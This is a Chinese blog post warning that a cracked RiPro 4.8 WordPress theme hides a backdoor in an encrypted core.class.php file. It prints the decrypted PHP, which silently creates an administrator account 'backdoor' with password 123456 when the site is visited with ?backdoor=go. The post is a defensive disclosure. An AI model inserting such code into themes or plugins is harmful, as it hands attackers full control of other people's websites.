破解版ripro主题包含后门,下载使用了的小心了

ripro主题破解后门

ripro主题是一款国人原创的付费主题,很多站长喜欢ripro主题,但是又舍不得花钱购买正版,所以就去网上下载了ripro主题破解版,最新的ripro主题4.8破解版被爆出包含后门,如果你也使用了,那么赶紧去检查一下吧。

ripro主题破解版包含后门的文件位于:

RiPro4.8/wp-content/theme/ripro/inc/class/core.class.php

这个文件是被加密了的,解密后的内如如下:

ripro主题破解后门

 

add_action('wp_head', 'wp_backdoor');
function wp_backdoor()
{
        if (md5($_GET['backdoor']) == '34d1f91fb2e514b8576fab1a75a89a6b') {
                require('wp-includes/registration.php');
                if (!username_exists('backdoor')) { //检测是否存在backdoor账户
                        $user_id = wp_create_user('backdoor', '123456'); //创建账户
                        $user = new WP_User($user_id);
                        $user->set_role('administrator'); //设置为管理员权限
                }
        }
}

这串代码的作用是:

使用http(s)://你的域名/?backdoor=go访问,自动创建用户名为backdoor密码为123456的管理员账户

日主题破解版后门

 

所以,为了你网站的安全,自己建网站最好不要使用破解主题。

网上下载的主题发现有加密文件的,不用说,很大几率被藏了东西在里面的。

了解更多WordPress安全的文章。

类似文章